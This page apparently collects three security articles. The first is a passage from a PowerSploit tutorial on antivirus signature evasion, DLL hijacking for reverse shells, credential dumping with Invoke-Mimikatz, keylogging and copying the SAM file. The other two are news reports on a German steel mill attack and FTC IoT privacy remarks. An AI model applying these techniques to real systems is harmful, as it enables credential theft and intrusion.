find the parts of file which have the AV signature. We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using: Running “Find-AVSignature” on a Meterpreter Windows executable: The installed antivirus detected malicious files and we can see bytes with the AV signature: Now we can see the bytes of “msf.exe” containing AV signatures. Get-DllLoadPath This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation. We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using: Find where “Acrobat.exe” loads “shell32.dll” DLL from: Invoke-Portscan This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all. We can easily install the Recon PowerShell script “Invoke-Portscan” using: Run a port scan for a list of hosts and ports: There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options. It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively. Invoke-ReverseDnsLookup This cmdlet is used to find the DNS PTR record for corresponding IP address(es). We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using: Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch: Unfortunately, it does not support comma separated values or file input of ranges like 173.194.117.1-50. It accepts only single IP or CIDR format for IP range. Get-HttpStatus This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server. We can easily install the Recon PowerShell script “Get-HttpStatus” using: Execute this cmdlet using the following command (the dictionary file is that of DirBuster): If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests: If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch. It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too. Get-Strings This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility. We can easily install the Reverse Engineering PowerShell script “Get-Strings” using: Get-Strings -Path <file_name_with_path> It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell ? Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now. Invoke-Mimikatz This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain. It is one of the most useful PowerSploit tools in a penetration testing engagement. We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using: Dump credentials using: Invoke-Mimikatz -DumpCreds You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….) Get-Keystrokes This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location. We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using: This cmdlet can be executed using the following command: Key log is stored in: c:usersmasterdesktopkeylogger.txt This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp. Invoke-NinjaCopy This cmdlet is used to copy protected files which cannot be copied when the operating system is running. We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using: Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file: When you try to perform the same operation using the “copy” command, the file cannot be copied: Source

Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it. I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage. This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet, the sophisticated digital weapon the U.S. and Israel launched against control systems in Iran in late 2007 or early 2008 to sabotage centrifuges at a uranium enrichment plant. That attack was discovered in 2010, and since then experts have warned that it was only a matter of time before other destructive attacks would occur. Industrial control systems have been found to be rife with vulnerabilities, though they manage critical systems in the electric grid, in water treatment plants and chemical facilities and even in hospitals and financial networks. A destructive attack on systems like these could cause even more harm than at a steel plant. It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack—sending targeted email that appears to come from a trusted source in order to trick the recipient into opening a malicious attachment or visiting a malicious web site where malware is downloaded to their computer. Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network. “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.” According to the report, the attackers appeared to possess advanced knowledge of industrial control systems. “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says. The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred. It’s also unclear if the attackers intended to cause the physical destruction or if this was simply collateral damage. The incident underscores, however, what experts have been warning about in the wake of Stuxnet: although that nation-state digital weapon had been expertly designed to avoid collateral damage, not all intrusions into critical infrastructure are likely to be as careful or as well-designed as Stuxnet, so damage may occur even when the hackers never intend it. The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap. But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless. It’s not known how the German network was configured. Source

Federal Trade Commission (FTC) Chairwoman Edith Ramirez used her opening remarks at the International Consumer Electronic Show (CES) on Tuesday to warn attendees of the future privacy issues the Internet of Things (IoT) could stir up. In 2015, she said there would be 25 billion connected devices and smart home devices will reach nearly 25 million, which could allow for the start of “smart-home hacking” and major privacy concerns. “Connected devices that provide increased convenience and improve health services are also collecting, transmitting, storing and often sharing vast amounts of consumer data, some of it highly personal, thereby creating a number of privacy risks,” she said. Companies creating devices should take particular interest in ensuring consumers' privacy and security, Ramirez said. Specifically, “security by design” should be adopted, which would have companies perform risk assessment for their designs, keeping privacy and security in mind. This security mindset would also involve “smart defaults,” including having users change default passwords during the set-up process. Ramirez urged the companies to consider encryption, especially when dealing with sensitive information. They also need to monitor products throughout their life cycle to keep up on identifying and patching vulnerabilities, she said. Additionally, the chairwoman advised that any personal data that is collected should follow “the principle of data minimization,” or only collecting information that is specifically needed. The data should be removed responsibly, as well. Ramirez closed her speech by saying that as companies invest billions of dollars in IoT, they should also “make appropriate investments in privacy and security.” Source